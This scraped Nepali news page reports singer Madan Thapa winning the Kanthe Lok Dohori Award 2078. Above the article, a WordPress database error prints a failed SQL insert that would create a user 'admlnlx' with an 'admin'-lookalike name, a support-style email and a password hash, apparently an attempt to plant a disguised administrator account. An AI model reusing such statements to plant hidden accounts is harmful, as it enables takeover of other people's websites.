WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDsAZRd8JKo5JgdcdeLx/j3bfFRAdZ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:14:45', '', 'admlnlx', 'admlnlx')

काँठे लोक दोहोरी अर्वाड २०७८ मदन थापाको पोल्टामा – Gaule Khabar

काँठे लोक दोहोरी अर्वाड २०७८ मदन थापाको पोल्टामा

काँठे लोक दोहोरी अर्वाड २०७८ मदन थापाको पोल्टामा

काठमाडौं । राष्ट्रिय काँठे लोकदोहरी अवार्ड लोकप्रिय गायक मदन थापाले हात परेका छन् ।

सुनाखरी मल्टिमिडिया फाउन्डेशनद्वारा राजधानीमा सम्पन्न राष्ट्रिय काँठे लोकदोहोरी अवार्ड २०७८ मा ‘पानी मिठो, गितको तर्फबाट सर्वोकृष्ट अवार्ड प्राप्त गर्न सफल भएको हो।

शुक्रवार राजधानीस्थित राष्ट्रिय नाँचघरमा आयोजित विशेष समारोह बीच सर्व उत्कृष्ट बिधाबाट थापालाई सम्मान गरिएको थियो ।

काँठे गीतले एउटा छुटै मौलिक विशेषता बोकेको छ । यस्ता मौलिक गीतलाई न्याय दिएर गाउने कलाकार हुन मदन थापा । उनी सरल स्वभावका काँठे लोक साङ्गितिक क्षेत्रलाई विशेष योगदान पुर्याउँदै आइरहेका छन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका